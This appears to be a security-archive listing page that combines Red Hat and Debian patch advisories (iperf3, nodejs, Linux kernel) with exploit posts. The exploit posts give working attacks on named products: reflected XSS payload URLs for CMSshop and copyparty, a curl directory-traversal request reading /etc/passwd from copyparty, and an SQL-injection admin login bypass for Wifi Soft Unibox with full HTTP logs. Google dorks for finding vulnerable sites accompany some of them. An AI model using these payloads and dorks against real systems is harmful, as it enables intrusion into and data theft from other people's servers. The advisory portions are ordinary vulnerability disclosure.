Red Hat Security Advisory 2023-4332-01 - An update for bind is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important.

Red Hat Security Advisory 2023-4332-01

Red Hat Security Advisory 2023-4326-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4326-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4326  
Issue date:        2023-07-31  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

ppc64:  
iperf3-3.1.7-3.el7_9.ppc.rpm  
iperf3-3.1.7-3.el7_9.ppc64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64.rpm

ppc64le:  
iperf3-3.1.7-3.el7_9.ppc64le.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64le.rpm

s390x:  
iperf3-3.1.7-3.el7_9.s390.rpm  
iperf3-3.1.7-3.el7_9.s390x.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390x.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
iperf3-debuginfo-3.1.7-3.el7_9.ppc.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc64.rpm

ppc64le:  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64le.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc64le.rpm

s390x:  
iperf3-debuginfo-3.1.7-3.el7_9.s390.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390x.rpm  
iperf3-devel-3.1.7-3.el7_9.s390.rpm  
iperf3-devel-3.1.7-3.el7_9.s390x.rpm

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkx8MuAAoJENzjgjWX9erEYj0P/2d3G7A9E7QLj4oT0Fvj3bKi  
fFUWHgq1yWILwZEZ2TYzCdi3BtK8YLLlg8CnkM7ruhY8rxKoi2VQPB26tieDgHUl  
uqxsfcqPhEJgmC1L07elC5Dj1fuifRktUjtqTMA4dO/Dntu4nLYKXKY3rNHMmrLt  
8mxyt1CirycnZWpSt4borBuzXEwhUme4joqERXj/IZ/0gqlUDRg1Lkc7Yj8hehH7  
Jv4Gzmb2PyiJekwnVXt+z0XSQDtg3RHUkytA8UL6YIg8XTX4s24XDmEhlj9gxELM  
JsXDaIWBG9RWQ1xDB3INSmPyF6DQN3d8MxGeioppkOPO2JvgyZcKmL5nfIq8ndPu  
JnecwpiED0cXSlXl8Hk1Rbpev4v0QAf8bvBXJlzDK5yT3NnINL8Rqe0E2yzLb0Gf  
3uVfk88W/QMWtf+MG7xfH8z7AVhMugAiJI4Co0pZNphIJypOKvVNJJ/oMtMlaGsE  
aXyr8MkT3IP903j9vhP9DB+rb2v+rbow1WsTIMYKHrFGUltnE4Lv8YNtZzot+LAv  
AZZ9Q+Kw3TvKs840PV25EjuSuLoZ8BbZnGv42vNSNKSK93IlDxoTDZWe5oU9W49D  
QGueQ6ZMNMU/G+bJichIsq0+VbkrxSaN+PsuWfSLnxGkr7FUpL7+l7olzgOpEd1o  
raizshf5Qy5u40DuAJNB  
=7C45  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4326-01

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Debian Security Advisory 5461-1

Red Hat Security Advisory 2023-4331-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4331-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4331  
Issue date:        2023-07-31  
CVE Names:         CVE-2023-30581 CVE-2023-30588 CVE-2023-30589   
                   CVE-2023-30590   
=====================================================================

1. Summary:

An update for nodejs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs  
(16.20.1). (BZ#2223334, BZ#2223336, BZ#2223338, BZ#2223340, BZ#2223342,  
BZ#2223344)

Security Fix(es):

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223334 - nodejs: Rebase to the latest Nodejs 16 release [rhel-9] [rhel-9.2.0.z]  
2223344 - nodejs: npm's /usr/etc/ softlink to /etc/ is preventing osbuild from creating Edge images. [rhel-9] [rhel-9.2.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
nodejs-16.20.1-1.el9_2.src.rpm

aarch64:  
nodejs-16.20.1-1.el9_2.aarch64.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.aarch64.rpm  
nodejs-debugsource-16.20.1-1.el9_2.aarch64.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.aarch64.rpm  
nodejs-libs-16.20.1-1.el9_2.aarch64.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.aarch64.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.aarch64.rpm

noarch:  
nodejs-docs-16.20.1-1.el9_2.noarch.rpm

ppc64le:  
nodejs-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-debugsource-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-libs-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.ppc64le.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.ppc64le.rpm

s390x:  
nodejs-16.20.1-1.el9_2.s390x.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.s390x.rpm  
nodejs-debugsource-16.20.1-1.el9_2.s390x.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.s390x.rpm  
nodejs-libs-16.20.1-1.el9_2.s390x.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.s390x.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.s390x.rpm

x86_64:  
nodejs-16.20.1-1.el9_2.x86_64.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.i686.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.x86_64.rpm  
nodejs-debugsource-16.20.1-1.el9_2.i686.rpm  
nodejs-debugsource-16.20.1-1.el9_2.x86_64.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.x86_64.rpm  
nodejs-libs-16.20.1-1.el9_2.i686.rpm  
nodejs-libs-16.20.1-1.el9_2.x86_64.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.i686.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.x86_64.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkx8MoAAoJENzjgjWX9erENmAP+wQYcM3guk8vt1iLbWZun3nt  
vv24zXWFgnWLkER482kfYXBpKV8QczIAgRK6REOOe7titcWjTvc6eVCT6dhRrNxe  
hiAB1hW8H0wQhXMKPFB1lWYvghxVHLuLkjFoK2ITex5e/slwKBlc1tEaEf0ljr5s  
4m/a3oP2Yt/k8RZv5IR68cdRdn1fOTGya06/gMkz2OydOb6s+vxQcMtX5yOfU/Mk  
UJWU1Ey2XALRAFOuC6DIB/G7ic1+G5QGFqVuVrmXecTChncliJEFhACGo9JHa3Y4  
NkxAp6b27IXoaOX+sbRzhE2rnequ7yWHM2OBrEcs/SYqGMXrO8cbtfR5SGqn7QX7  
geCgst75yBBSlEJWHsUcZ6xRUFG3igPe7bbhbwc3AVEJFijjg2qOC0V72PLn86rt  
cUzxiuXPyiRmzdUjbrLQGUq2a+/efwvq3909UL/iWYXYWJtE9yReIS/F0eWeiS4z  
+tUlL9BPCGbvdZUZ3mNlg1lWFJTsnDAH+QmYkLYbgp49GCH9COBOeQHGy0QBN052  
NRs4Y8wJf12RFBPirI0BddCWARrFAOqV2si1nehf1J95ej/uqoKrAXALXD3e2VhU  
YRnurCXgAbqcY6+LGz1k0ucrisDXRG2PzXRWnlCx3mI4YH0BubYgA7JFjEQGtpNh  
BVkzXu4g13lrTdfATKty  
=QBcD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4331-01

Red Hat Security Advisory 2023-4325-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-4325-01

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

Copyparty version 1.8.2 suffers from a directory traversal vulnerability.

    # Exploit Title: copyparty 1.8.2 - Directory Traversal# Date: 14/07/2023# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2# Version: <=1.8.2# Tested on: Debian Linux# CVE : CVE-2023-37474#DescriptionCopyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.#POCcurl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

Copyparty 1.8.2 Directory Traversal

Copyparty version 1.8.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)# Date: 23/07/2023# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6# Version: <=1.8.6# Tested on: Debian Linux# CVE : CVE-2023-38501#DescriptionCopyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.#POChttps://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

Copyparty 1.8.6 Cross Site Scripting

Red Hat Security Advisory 2023-4328-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-4328-01

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

Tag

#linux